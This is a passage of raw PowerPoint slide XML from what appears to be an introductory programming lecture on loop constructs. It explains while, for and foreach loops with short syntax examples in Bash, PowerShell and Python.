            <a:ext cx="453004" cy="226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344067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DEFED-8BBF-4AF2-9E92-4A2D8DAFE5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DF6DEE2-9820-46AF-91FD-78429E36BC97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loops</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76B6044B-E9CD-466A-BB86-D4283F1DC25C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="6951662" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>While</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses a conditional to adjudicate when to stop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do-While flips the structure. Always runs once.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses a range and a counter to determine loops. Syntax varies by language.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REMEMBER: Computers count from ZERO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ForEach</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> loop, but iterates over an array’s objects instead of a counter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4B69EC-E69F-42E1-8929-AD825494518F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7487920" y="1113200"/>
            <a:ext cx="4084320" cy="4631600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{012FF433-E994-45AA-AF9E-342FA2EF5B45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8617009" y="5726674"/>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Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PSEUDOCODE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2612935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6FB409-4487-4B34-A32E-819956C8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EB51D06-5624-42D0-A25D-34687061ED34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bash Loops</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D15ABF6-F249-4F13-ABAF-1C03194DBA8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="352815" y="1687062"/>
            <a:ext cx="4359358" cy="1598136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB0C15C4-66C5-4EFC-84FC-8BB79D8FB6E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1418135" y="3144313"/>
            <a:ext cx="4306089" cy="1979914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7EFAE1C-602C-48D9-9896-1AA2FD747B52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093699" y="1246238"/>
            <a:ext cx="3018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While Loop (No Do-While)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E180401-148D-4304-8B8D-A0E154BF6B97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6106234" y="1711843"/>
            <a:ext cx="4133368" cy="1880792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C274C6C9-1A95-42FF-9355-1F171983A03D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8103713" y="3144313"/>
            <a:ext cx="3726502" cy="2086533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4D0B1C9-51F9-4EB1-9FBF-E0627BE07741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7062950" y="946364"/>
            <a:ext cx="48269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For and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ForEach</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Bash basically uses a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ForEach</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 all the time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C63DF55-6282-43ED-A015-53A06182A109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533525" y="5111415"/>
            <a:ext cx="419069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while [[ test ]];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done</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{764F0BB9-507A-448F-9A3A-CA0CE1995A25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8001301" y="5222913"/>
            <a:ext cx="419069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for var in array;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done</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37226317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6FB409-4487-4B34-A32E-819956C8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EB51D06-5624-42D0-A25D-34687061ED34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell Loops</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7EFAE1C-602C-48D9-9896-1AA2FD747B52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409141" y="1344065"/>
            <a:ext cx="2390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While/Do-Until Loop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4D0B1C9-51F9-4EB1-9FBF-E0627BE07741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8120028" y="1304154"/>
            <a:ext cx="5565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For</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA325B99-DE74-4A95-8FFB-8B16F079065D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="8010"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="207134" y="1692433"/>
            <a:ext cx="4794412" cy="1528924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A69BA60-E272-470F-AB73-DC0B5293BC2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="4661"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="214547" y="4273965"/>
            <a:ext cx="4794410" cy="1143554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD226D37-5386-4B0F-8602-BF51819CEF51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5628858" y="1713397"/>
            <a:ext cx="5538905" cy="899237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3438C469-4A0D-4096-8C60-E3A8ADA7C382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10954705" y="1381897"/>
            <a:ext cx="708721" cy="1562235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEE7CCDA-5531-4EB1-919F-BC2AAA5CFC41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5647529" y="4107834"/>
            <a:ext cx="5570096" cy="927040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FE841A4-FE07-41C4-8D3D-E0274BABC154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7878579" y="377633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ForEach</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5" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29DBBB28-BB3D-4607-BF0C-A2EAC899E499}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10417455" y="4487526"/>
            <a:ext cx="1600339" cy="830652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{168F141F-0F1A-410E-8755-34A70D120831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="207135" y="3389231"/>
            <a:ext cx="4801822" cy="716860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31DA6F79-8E5A-46F2-BE8A-38225746E41B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214547" y="5485663"/>
            <a:ext cx="21261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while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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D190A3E-CC81-4076-8C0A-505A0D010C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2910940" y="5443544"/>
            <a:ext cx="221941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do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until (test)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F4D48BA-05D0-4087-A345-100EFD355AE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5996356" y="2619999"/>
            <a:ext cx="487244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for (counter; limit; increment)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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{440E8705-CF31-4579-968A-611E687C011F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6730696" y="5091427"/>
            <a:ext cx="36867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for (var in array)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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CF7CAA4-1DE9-405B-AB5B-86523972ECBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2467992" y="5553092"/>
            <a:ext cx="0" cy="813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090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6FB409-4487-4B34-A32E-819956C8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EB51D06-5624-42D0-A25D-34687061ED34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python Loops</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7EFAE1C-602C-48D9-9896-1AA2FD747B52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1062795" y="1249984"/>
            <a:ext cx="383951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While Loop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Python does not have a Do-While</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50ECE88D-3865-41E2-A315-9CBC8A7C1FBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="178886" y="3113171"/>
            <a:ext cx="5607332" cy="1628599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDCFF2E6-EC7F-430B-A6EF-C395FDF0B333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="196959" y="1848220"/>
            <a:ext cx="5484573" cy="1200328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79F9A4D-4FB7-43CD-BA67-BE163297924F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6498559" y="1634584"/>
            <a:ext cx="4717000" cy="1809613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0846F653-73EB-4F39-84AA-F9C338E28A9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6573553" y="970591"/>
            <a:ext cx="504497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For and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ForEach</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Python basically uses a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ForEach</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 all the time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
